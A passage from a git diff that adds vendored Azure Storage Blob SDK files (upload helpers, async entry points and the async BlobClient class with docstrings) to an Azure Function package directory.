blob_http_headers=blob_headers, + cls=return_response_headers, + validate_content=validate_content, + headers=headers, + tier=tier.value if tier else None, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + **kwargs) + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceModifiedError as mod_error: + if not overwrite: + _convert_mod_error(mod_error) + raise + + +def upload_page_blob( + client=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if not overwrite and not _any_conditions(**kwargs): + kwargs['modified_access_conditions'].if_none_match = '*' + if length is None or length < 0: + raise ValueError("A content length must be specified for a Page Blob.") + if length % 512 != 0: + raise ValueError("Invalid page blob size: {0}. " + "The size must be aligned to a 512-byte boundary.".format(length)) + if kwargs.get('premium_page_blob_tier'): + premium_page_blob_tier = kwargs.pop('premium_page_blob_tier') + try: + headers['x-ms-access-tier'] = premium_page_blob_tier.value + except AttributeError: + headers['x-ms-access-tier'] = premium_page_blob_tier + if encryption_options and encryption_options.get('data'): + headers['x-ms-meta-encryptiondata'] = encryption_options['data'] + blob_tags_string = kwargs.pop('blob_tags_string', None) + progress_hook = kwargs.pop('progress_hook', None) + + response = client.create( + content_length=0, + blob_content_length=length, + blob_sequence_number=None, + blob_http_headers=kwargs.pop('blob_headers', None), + blob_tags_string=blob_tags_string, + cls=return_response_headers, + headers=headers, + **kwargs) + if length == 0: + return response + + kwargs['modified_access_conditions'] = ModifiedAccessConditions(if_match=response['etag']) + return upload_data_chunks( + service=client, + uploader_class=PageBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_page_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + encryption_options=encryption_options, + progress_hook=progress_hook, + headers=headers, + **kwargs) + + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceModifiedError as mod_error: + if not overwrite: + _convert_mod_error(mod_error) + raise + + +def upload_append_blob( # pylint: disable=unused-argument + client=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if length == 0: + return {} + blob_headers = kwargs.pop('blob_headers', None) + append_conditions = AppendPositionAccessConditions( + max_size=kwargs.pop('maxsize_condition', None), + append_position=None) + blob_tags_string = kwargs.pop('blob_tags_string', None) + progress_hook = kwargs.pop('progress_hook', None) + + try: + if overwrite: + client.create( + content_length=0, + blob_http_headers=blob_headers, + headers=headers, + blob_tags_string=blob_tags_string, + **kwargs) + return upload_data_chunks( + service=client, + uploader_class=AppendBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + append_position_access_conditions=append_conditions, + progress_hook=progress_hook, + headers=headers, + **kwargs) + except HttpResponseError as error: + if error.response.status_code != 404: + raise + # rewind the request body if it is a stream + if hasattr(stream, 'read'): + try: + # attempt to rewind the body to the initial position + stream.seek(0, SEEK_SET) + except UnsupportedOperation: + # if body is not seekable, then retry would not work + raise error + client.create( + content_length=0, + blob_http_headers=blob_headers, + headers=headers, + blob_tags_string=blob_tags_string, + **kwargs) + return upload_data_chunks( + service=client, + uploader_class=AppendBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + append_position_access_conditions=append_conditions, + progress_hook=progress_hook, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_version.py new file mode 100644 index 0000000..c4ae600 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_version.py @@ -0,0 +1,7 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +VERSION = "12.12.0" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__init__.py new file mode 100644 index 0000000..ba5b381 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__init__.py @@ -0,0 +1,143 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import os + +from ._list_blobs_helper import BlobPrefix +from .._models import BlobType +from .._shared.policies_async import ExponentialRetry, LinearRetry +from ._blob_client_async import BlobClient +from ._container_client_async import ContainerClient +from ._blob_service_client_async import BlobServiceClient +from ._lease_async import BlobLeaseClient +from ._download_async import StorageStreamDownloader + + +async def upload_blob_to_url( + blob_url, # type: str + data, # type: Union[Iterable[AnyStr], IO[AnyStr]] + credential=None, # type: Any + **kwargs): + # type: (...) -> dict[str, Any] + """Upload data to a given URL + + The data will be uploaded as a block blob. + + :param str blob_url: + The full URI to the blob. This can also include a SAS token. + :param data: + The data to upload. This can be bytes, text, an iterable or a file-like object. + :type data: bytes or str or Iterable + :param credential: + The credentials with which to authenticate. This is optional if the + blob URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword bool overwrite: + Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob_to_url will overwrite any existing data. If set to False, the + operation will fail with a ResourceExistsError. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword dict(str,str) metadata: + Name-value pairs associated with the blob as metadata. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https as https (the default) will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword str encoding: + Encoding to use if text is supplied as input. Defaults to UTF-8. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: dict(str, Any) + """ + async with BlobClient.from_blob_url(blob_url, credential=credential) as client: + return await client.upload_blob(data=data, blob_type=BlobType.BlockBlob, **kwargs) + + +async def _download_to_stream(client, handle, **kwargs): + """Download data to specified open file-handle.""" + stream = await client.download_blob(**kwargs) + await stream.readinto(handle) + + +async def download_blob_from_url( + blob_url, # type: str + output, # type: str + credential=None, # type: Any + **kwargs): + # type: (...) -> None + """Download the contents of a blob to a local file or stream. + + :param str blob_url: + The full URI to the blob. This can also include a SAS token. + :param output: + Where the data should be downloaded to. This could be either a file path to write to, + or an open IO handle to write to. + :type output: str or writable stream + :param credential: + The credentials with which to authenticate. This is optional if the + blob URL already has a SAS token or the blob is public. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, + an account shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword bool overwrite: + Whether the local file should be overwritten if it already exists. The default value is + `False` - in which case a ValueError will be raised if the file already exists. If set to + `True`, an attempt will be made to write to the existing file. If a stream handle is passed + in, this value is ignored. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :keyword int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https as https (the default) will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used, because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :rtype: None + """ + overwrite = kwargs.pop('overwrite', False) + async with BlobClient.from_blob_url(blob_url, credential=credential) as client: + if hasattr(output, 'write'): + await _download_to_stream(client, output, **kwargs) + else: + if not overwrite and os.path.isfile(output): + raise ValueError("The file '{}' already exists.".format(output)) + with open(output, 'wb') as file_handle: + await _download_to_stream(client, file_handle, **kwargs) + + +__all__ = [ + 'upload_blob_to_url', + 'download_blob_from_url', + 'BlobServiceClient', + 'BlobPrefix', + 'ContainerClient', + 'BlobClient', + 'BlobLeaseClient', + 'ExponentialRetry', + 'LinearRetry', + 'StorageStreamDownloader' +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..bb8d1c5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_client_async.cpython-39.pyc new file mode 100644 index 0000000..5fd972e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_client_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_service_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_service_client_async.cpython-39.pyc new file mode 100644 index 0000000..65ec5f3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_blob_service_client_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_container_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_container_client_async.cpython-39.pyc new file mode 100644 index 0000000..5bb999c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_container_client_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_download_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_download_async.cpython-39.pyc new file mode 100644 index 0000000..9a9902c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_download_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_lease_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_lease_async.cpython-39.pyc new file mode 100644 index 0000000..a62ddbc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_lease_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_list_blobs_helper.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_list_blobs_helper.cpython-39.pyc new file mode 100644 index 0000000..d87a7e6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_list_blobs_helper.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_models.cpython-39.pyc new file mode 100644 index 0000000..cfc9c2e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_upload_helpers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_upload_helpers.cpython-39.pyc new file mode 100644 index 0000000..27fe9a3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/__pycache__/_upload_helpers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_client_async.py new file mode 100644 index 0000000..9575061 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_client_async.py @@ -0,0 +1,2736 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=too-many-lines, invalid-overridden-method +from functools import partial +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, IO, Iterable, AnyStr, Dict, List, Tuple, + TYPE_CHECKING +) +import warnings + +from azure.core.async_paging import AsyncItemPaged +from azure.core.exceptions import ResourceNotFoundError, HttpResponseError, ResourceExistsError +from azure.core.pipeline import AsyncPipeline +from azure.core.tracing.decorator import distributed_trace +from azure.core.tracing.decorator_async import distributed_trace_async + + +from .._shared.base_client_async import AsyncStorageAccountHostsMixin, AsyncTransportWrapper +from .._shared.policies_async import ExponentialRetry +from .._shared.response_handlers import return_response_headers, process_storage_error +from .._deserialize import get_page_ranges_result, parse_tags, deserialize_pipeline_response_into_cls +from .._serialize import get_modify_conditions, get_api_version, get_access_conditions +from .._generated.aio import AzureBlobStorage +from .._generated.models import CpkInfo +from .._deserialize import deserialize_blob_properties +from .._blob_client import BlobClient as BlobClientBase +from ._upload_helpers import ( + upload_block_blob, + upload_append_blob, + upload_page_blob) +from .._models import BlobType, BlobBlock, BlobProperties, PageRange +from ._models import PageRangePaged +from ._lease_async import BlobLeaseClient +from ._download_async import StorageStreamDownloader + + +if TYPE_CHECKING: + from datetime import datetime + from .._models import ( # pylint: disable=unused-import + ContentSettings, + ImmutabilityPolicy, + PremiumPageBlobTier, + StandardBlobTier, + SequenceNumberAction + ) + + +class BlobClient(AsyncStorageAccountHostsMixin, BlobClientBase): # pylint: disable=too-many-public-methods + """A client to interact with a specific blob, although that blob may not yet exist. + + :param str account_url: + The URI to the storage account. In order to create a client given the full URI to the blob, + use the :func:`from_blob_url` classmethod. + :param container_name: The container name for the blob. + :type container_name: str + :param blob_name: The name of the blob with which to interact. If specified, this value will override + a blob value specified in the blob URL. + :type blob_name: str + :param str snapshot: + The optional blob snapshot on which to operate. This can be the snapshot ID string + or the response returned from :func:`create_snapshot`. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. + :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication_async.py + :start-after: [START create_blob_client] + :end-before: [END create_blob_client] + :language: python + :dedent: 8 + :caption: Creating the BlobClient from a URL to a public blob (no auth needed). + + .. literalinclude:: ../samples/blob_samples_authentication_async.py + :start-after: [START create_blob_client_sas_url] + :end-before: [END create_blob_client_sas_url] + :language: python + :dedent: 8 + :caption: Creating the BlobClient from a SAS URL to a blob. + """ + def __init__( + self, account_url, # type: str + container_name, # type: str + blob_name, # type: str + snapshot=None, # type: Optional[Union[str, Dict[str, Any]]] + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + kwargs['retry_policy'] = kwargs.get('retry_policy') or ExponentialRetry(**kwargs) + super(BlobClient, self).__init__( + account_url, + container_name=container_name, + blob_name=blob_name, + snapshot=snapshot, + credential=credential, + **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + @distributed_trace_async + async def get_account_information(self, **kwargs): # type: ignore + # type: (Optional[int]) -> Dict[str, str] + """Gets information related to the storage account in which the blob resides. + + The information can also be retrieved if the user has a SAS to a container or blob. + The keys in the returned dictionary include 'sku_name' and 'account_kind'. + + :returns: A dict of account information (SKU and account type). + :rtype: dict(str, str) + """ + try: + return await self._client.blob.get_account_info(cls=return_response_headers, **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def upload_blob_from_url(self, source_url, **kwargs): + # type: (str, Any) -> Dict[str, Any] + """ + Creates a new Block Blob where the content of the blob is read from a given URL. + The content of an existing blob is overwritten with the new blob. + + :param str source_url: + A URL of up to 2 KB in length that specifies a file or blob. + The value should be URL-encoded as it would appear in a request URI. + If the source is in another account, the source must either be public + or must be authenticated via a shared access signature. If the source + is public, no authentication is required. + Examples: + https://myaccount.blob.core.windows.net/mycontainer/myblob + + https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot= + + https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. If set to False, the + operation will fail with ResourceExistsError. + :keyword bool include_source_blob_properties: + Indicates if properties from the source blob should be copied. Defaults to True. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + :paramtype tags: dict(str, str) + :keyword bytearray source_content_md5: + Specify the md5 that is used to verify the integrity of the source bytes. + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword destination_lease: + The lease ID specified for this header must match the lease ID of the + destination blob. If the request does not include the lease ID or it is not + valid, the operation fails with status code 412 (Precondition Failed). + :paramtype destination_lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._upload_blob_from_url_options( + source_url=self._encode_source_url(source_url), + **kwargs) + try: + return await self._client.block_blob.put_blob_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def upload_blob( + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + blob_type=BlobType.BlockBlob, # type: Union[str, BlobType] + length=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Any + """Creates a new blob from a data source with automatic chunking. + + :param data: The blob data to upload. + :param ~azure.storage.blob.BlobType blob_type: The type of the blob. This can be + either BlockBlob, PageBlob or AppendBlob. The default value is BlockBlob. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. If set to False, the + operation will fail with ResourceExistsError. The exception to the above is with Append + blob types: if set to False and the data already exists, an error will not be raised + and the data will be appended to the existing blob. If set overwrite=True, then the existing + append blob will be deleted, and a new one created. Defaults to False. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + If specified, upload_blob only succeeds if the + blob's lease is active and matches this ID. + Required if the blob has an active lease. + :paramtype: ~azure.storage.blob.aio.BlobLeaseClient + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + Currently this parameter of upload_blob() API is for BlockBlob only. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + Currently this parameter of upload_blob() API is for BlockBlob only. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int max_concurrency: + Maximum number of parallel connections to use when the blob size exceeds + 64MB. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword progress_hook: + An async callback to track the progress of a long running upload. The signature is + function(current: int, total: Optional[int]) where current is the number of bytes transfered + so far, and total is the size of the blob or None if the size is unknown. + :paramtype progress_hook: Callable[[int, Optional[int]], Awaitable[None]] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world_async.py + :start-after: [START upload_a_blob] + :end-before: [END upload_a_blob] + :language: python + :dedent: 16 + :caption: Upload a blob to the container. + """ + options = self._upload_blob_options( + data, + blob_type=blob_type, + length=length, + metadata=metadata, + **kwargs) + if blob_type == BlobType.BlockBlob: + return await upload_block_blob(**options) + if blob_type == BlobType.PageBlob: + return await upload_page_blob(**options) + return await upload_append_blob(**options) + + @distributed_trace_async + async def download_blob(self, offset=None, length=None, **kwargs): + # type: (Optional[int], Optional[int], Any) -> StorageStreamDownloader + """Downloads a blob to the StorageStreamDownloader. The readall() method must + be used to read all the content or readinto() must be used to download the blob into + a stream. Using chunks() returns an async iterator which allows the user to iterate over the content in chunks. + + :param int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to download. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. If specified, download_blob only + succeeds if the blob's lease is active and matches this ID. Value can be a + BlobLeaseClient object or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has 